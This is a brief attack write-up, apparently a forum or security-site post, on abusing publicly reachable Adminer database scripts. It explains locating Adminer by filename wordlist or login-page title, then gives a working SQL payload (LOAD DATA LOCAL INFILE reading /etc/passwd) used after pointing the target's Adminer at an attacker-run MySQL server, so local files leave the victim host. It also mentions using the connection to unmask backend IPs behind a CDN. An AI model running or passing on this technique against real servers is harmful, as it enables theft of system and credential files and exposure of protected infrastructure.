An Adminer script can be discovered on a web-server by either using the following word-list (containing all official file-names since v.3.0.0) or searching for a renamed version, file-name e.g. "connect.php", HTTP-response body containing "<title>Login - Adminer</title>":
https://raw.githubusercontent.com/kaimi-io/web-fuzz-wordlists/master/adminer.txtThe attack requires to setup a MySQL server with a public IP address, after that the external Adminer script can be used in combination with the owned IP address (instead of default value "localhost" ["Server" field]). Login and read local files:
LOAD DATA LOCAL INFILE '/etc/passwd'(test.test = table.row)
INTO TABLE test.test
FIELDS TERMINATED BY "\n"
This kind of "back-connection" can also be used to expose a backend IP-address, bypassing a frontend proxy/CDN.
Greetz @YS | Source: